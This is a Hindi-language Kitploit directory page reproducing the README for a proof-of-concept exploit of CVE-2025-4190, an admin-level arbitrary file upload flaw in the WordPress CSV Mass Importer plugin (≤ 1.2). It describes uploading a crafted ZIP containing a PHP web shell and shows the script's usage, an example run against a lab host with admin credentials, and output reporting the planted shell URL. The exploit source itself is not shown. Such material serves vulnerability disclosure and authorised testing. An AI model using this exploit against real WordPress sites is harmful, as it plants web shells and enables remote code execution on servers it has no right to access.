Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-4190 — CSV Mass Importer <= 1.2 - Admin+ मनमानी फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-4190
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-4190

CVE-2025-4190

CSV Mass Importer <= 1.2 - Admin+ मनमानी फ़ाइल अपलोड

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-4190 — WordPress CSV Mass Importer ≤ 1.2 मनमाना फ़ाइल अपलोड

WordPress Plugin
CVE
Status
Author


📌 विवरण

वर्डप्रेस के लिए CSV Mass Importer प्लगइन (≤ 1.2) में Admin+ मनमाना फ़ाइल अपलोड कमजोरी है।
अपलोड की गई फ़ाइलों के अनुचित सत्यापन के कारण, उच्च‑विशेषाधिकार वाले उपयोगकर्ता (जैसे एडमिन) सर्वर पर मनमानी फ़ाइलें अपलोड कर सकते हैं, भले ही इसे प्रतिबंधित किया जाना चाहिए — उदाहरण के लिए मल्टीसाइट सेटअप में।

यह कमजोरी एक हमलावर को PHP शेल या दुर्भावनापूर्ण फ़ाइलें अपलोड करने की अनुमति देती है, जिससे सर्वर पर रिमोट कोड निष्पादन (RCE) होता है।

Nxploited (Khaled Alenazi) द्वारा खोजा गया।


🔥 विवरण

  • प्लगइन नाम: CSV Mass Importer
  • प्रभावित संस्करण: ≤ 1.2
  • कमजोरी प्रकार: Admin+ मनमाना फ़ाइल अपलोड
  • CVE: CVE-2025-4190
  • WPVDB ID: e525ece5-6e03-4aee-bf5b-6ae0b961f027
  • मूल शोधकर्ता: Khaled Alenazi (Nxploited)
  • प्रस्तुतकर्ता वेबसाइट: https://github.com/Nxploited
  • सत्यापित: ✅

  • 💻 प्रूफ ऑफ कॉन्सेप्ट (PoC)

    CSV आयात सुविधा का उपयोग करते समय प्लगइन अपलोड की गई फ़ाइलों की सही जाँच करने में विफल रहता है।
    PHP शेल वाली एक तैयार की गई ZIP फ़ाइल को अपलोड किया जा सकता है और सार्वजनिक रूप से सुलभ निर्देशिका में निकाला जा सकता है।

    शेल पथ उदाहरण:

    root@kitploit:~
    <target-url>/wp-content/uploads/cmi-data/nxploited.php
    

    🚀 उपयोग

    स्क्रिप्ट

    इस रिपॉजिटरी में एक तैयार पायथन एक्सप्लॉइट स्क्रिप्ट है: 4190.py

    सहायता मेनू

    root@kitploit:~
    python CVE-2025-4190.py --help
    usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
    
    WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
    
    options:
      -h, --help            show this help message and exit
      --url, -u URL         Target WordPress site URL
      --username, -un USERNAME
                            WordPress admin username
      --password, -p PASSWORD
                            WordPress admin password
    

    उदाहरण रन

    root@kitploit:~
    python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
    

    अपेक्षित आउटपुट

    root@kitploit:~
    [+] Logged in successfully.
    [+] Payload 'nxploited.zip' created successfully.
    [+] Payload uploaded successfully.
    [+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
    Exploited By Nxploited (Khaled_alenazi)
    

    🕰 समयरेखा

    • सार्वजनिक रूप से प्रकाशित: 2025-04-26 (लगभग 11 दिन पहले)
    • डेटाबेस में जोड़ा गया: 2025-05-07 (लगभग 1 घंटा पहले)
    • अंतिम अद्यतन: 2025-05-07 (लगभग 1 घंटा पहले)

    🛡 संदर्भ

    • CVE-2025-4190 WPScan पर

    ⚠ अस्वीकरण

    यह कोड केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
    लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
    जिम्मेदारी से उपयोग करें और केवल उन सिस्टम पर करें जिनका परीक्षण करने के लिए आप अधिकृत हैं।


    Khaled Alenazi (Nxploited) द्वारा खोजा और विकसित किया गया 🌟

    टूल डाउनलोड करें